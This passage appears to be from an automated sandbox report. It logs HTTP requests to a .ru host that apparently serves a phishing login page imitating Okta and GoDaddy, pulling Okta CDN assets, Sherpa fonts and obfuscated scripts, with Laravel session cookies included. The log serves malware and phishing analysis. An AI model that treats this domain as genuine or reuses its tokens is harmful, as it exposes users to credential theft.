laravel_session=eyJpdiI6IklCd3NiK1V0cW1SMWZXL01ENFF4SUE9PSIsInZhbHVlIjoiVEhReXFad2J2QVo1ekJzMGVQT1A1VFlSekdwL0ZWbzlmUTM5VmlxeXhFVkpZVHVsYUlQdTJVQzhLSUpxTytKN1ErNjN2RTB0cUoxQWcyZEVneTJSTS9sU0Q4RXhwVE0rTk05RWpGY1ZnMXpYSlBYenUzTTlEYjNoZkNncEE1S2UiLCJtYWMiOiI1NjA0MjQ2YmFiYzYwZTcyYmEyZmE2ZmEzZDEwMDkwZWZmMDNhMDE3ZjUzMjk4YzRlZjc0NzVlNWY4NmM3MmNmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fqrVzJ7QK65jRHLycjIYeEjqknYSpo HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjNvd0lTNTdGc2VUa0pTblpZUS9leUE9PSIsInZhbHVlIjoiTWEyc0ZUVGZmUTlnMjczMVRwOFBvbzdnVE1DWkdvbEw0K0hwZFovMUUvOERpQitmOHg1NzFJRUV0ZXZTd2N5VW9kVjAxb1p4bkE0Q0xmWXRIeTVhQk5nRk9wamdacjRrdmgvcjluc0FVYjA3K1lYb3NCOWJmZ2x4TmtIOVQ1eGMiLCJtYWMiOiIxYjU3ZTAxMGY0ZWRlMTc1N2U5ZmY2NmFhZDliZjVkY2M0ODQzODQ5NDg3ODJhMTk5NWI3MzA1ZWQyYTk3ZTkwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IklCd3NiK1V0cW1SMWZXL01ENFF4SUE9PSIsInZhbHVlIjoiVEhReXFad2J2QVo1ekJzMGVQT1A1VFlSekdwL0ZWbzlmUTM5VmlxeXhFVkpZVHVsYUlQdTJVQzhLSUpxTytKN1ErNjN2RTB0cUoxQWcyZEVneTJSTS9sU0Q4RXhwVE0rTk05RWpGY1ZnMXpYSlBYenUzTTlEYjNoZkNncEE1S2UiLCJtYWMiOiI1NjA0MjQ2YmFiYzYwZTcyYmEyZmE2ZmEzZDEwMDkwZWZmMDNhMDE3ZjUzMjk4YzRlZjc0NzVlNWY4NmM3MmNmIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /zcjFzAH9d8ZCrlbbUJYhVZkgMzwgwgU3pf6BvbNthEp6EXpgy HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklueW51VHNCbTQyZnBUQ2VtYmVENGc9PSIsInZhbHVlIjoiY0FmMWM0SzZINDkweHBvaXhJWU5SSlpYZUd1S1MrQ0pJWTV6UnQya0M0TmM5S3o4dEJFc2NhKzRWd3VZVUhjK0lCWnNOaEZTdTNWVlZNbUp4bGhFd1puQWswVndtWGFUSkd0d01KMUxWcmJxNXJpNGFPb0l5OU5ML0pBeHNnOEQiLCJtYWMiOiIyYzczOGVlYjZhZTliZjZmNjEzMjQxZTMzODY3ZWFlYmE4NDAyNjZkNDdjY2RlYjExMGJjMTVkNzZlMjM4NTBkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik1HNmNxcFQ1WWo3QU9lRGFDcVYxcVE9PSIsInZhbHVlIjoiVkx1Rm1TNXpQZ0tMdEdxNnpCdml1Um1CS1I2eHhCMnhUa25CYjU3d0ZPSVpLV2pBb2d1amE5SkREYnRmUi9qZnFXUTRTaVUya2lkNVVsOXhRNTM2dWh2S3RMNm5ENE1DUURuVTFuMVp1Wk8rUnFWTkNqQkZLWHNueTZTaCtnaG8iLCJtYWMiOiI5OTI1NTMzZjM4MjE1NTA0Zjk2ODkzYWQ1ZGE2NjdjYmM3NzUzMTZiNGUyZGY2NGNjZTBjYzJmNGNiZDQyZTgxIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXA HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://iy8se.zvptaird.ru/UKcxuUr/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IklueW51VHNCbTQyZnBUQ2VtYmVENGc9PSIsInZhbHVlIjoiY0FmMWM0SzZINDkweHBvaXhJWU5SSlpYZUd1S1MrQ0pJWTV6UnQya0M0TmM5S3o4dEJFc2NhKzRWd3VZVUhjK0lCWnNOaEZTdTNWVlZNbUp4bGhFd1puQWswVndtWGFUSkd0d01KMUxWcmJxNXJpNGFPb0l5OU5ML0pBeHNnOEQiLCJtYWMiOiIyYzczOGVlYjZhZTliZjZmNjEzMjQxZTMzODY3ZWFlYmE4NDAyNjZkNDdjY2RlYjExMGJjMTVkNzZlMjM4NTBkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik1HNmNxcFQ1WWo3QU9lRGFDcVYxcVE9PSIsInZhbHVlIjoiVkx1Rm1TNXpQZ0tMdEdxNnpCdml1Um1CS1I2eHhCMnhUa25CYjU3d0ZPSVpLV2pBb2d1amE5SkREYnRmUi9qZnFXUTRTaVUya2lkNVVsOXhRNTM2dWh2S3RMNm5ENE1DUURuVTFuMVp1Wk8rUnFWTkNqQkZLWHNueTZTaCtnaG8iLCJtYWMiOiI5OTI1NTMzZjM4MjE1NTA0Zjk2ODkzYWQ1ZGE2NjdjYmM3NzUzMTZiNGUyZGY2NGNjZTBjYzJmNGNiZDQyZTgxIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /56id5k1jcdn8CYj8920 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /xyh5D7hAQpqM0g4ef30 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff2 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveOrigin: https://iy8se.zvptaird.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-bold.woff HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveOrigin: https://iy8se.zvptaird.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff2 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveOrigin: https://iy8se.zvptaird.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-regular.woff HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveOrigin: https://iy8se.zvptaird.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://iy8se.zvptaird.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf.woff2 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveOrigin: https://iy8se.zvptaird.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-aliveOrigin: https://iy8se.zvptaird.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Img0WExFZzMweWdESVNMMVdlWDQ0c1E9PSIsInZhbHVlIjoiRzZNbSs5L3RJdC9HUGRjTzN1am05U3IrM0hlcmhsOW5ZVmVqSzNnL09HOGVIV2o3RUlkbVppM2F6dWtsOGhKYXBtcjhKVml2VnNqWDh0VzdVQjNyTC9oTGE4VDNndG9QekZzR3p1dFJTVjFGOTV5Q3dZcmkvbHAvQjlaYkRMeUEiLCJtYWMiOiI4MTMyNjk0Njg5NDRiYmNkN2RlYzE3MjdiZWE3N2Q3ZTMyOTRlNjE3Mzc0MTIzMzJlYTFkMmU3MjJkZWExZmZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5JeTFWRGEwRG1uSEZ4VFZ4YThYL2c9PSIsInZhbHVlIjoiNGdBVmY1T3B3MFVFbkc3c21sRElMdzJlUGVCbU5OLzJDVVM5VCtFbUVhSS8vR2E0WnFzYVJOcW5icHNoanp2cWkyaWs5ME9sNGdGRWkvTUpXS3k2amJaSGNhVHlXbURMOGh3bVZJb2NJMzZ5cHFGQVBmdlRwSmRJK1ZFV2JhZ2kiLCJtYWMiOiJmYzhlY2VjNmQ3NTEzNTMyNjZjYTY2OGI0Zjc2N2FkZGVlYTQ2OTRmZjQ1YmJmMzlkYzczY2Q3NjBkNGM1YjU5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /34NoRRFidh9TgYIYOlijungyGciExI5Vo0y89105 HTTP/1.1Host: iy8se.zvptaird.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://iy8se.zvptaird.ru/ivohlxgxajszkjjzide5p9uyexy6uculslz16r2o94d9p?LCLGTAWIJXKHOAAXGVNIPXAAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: 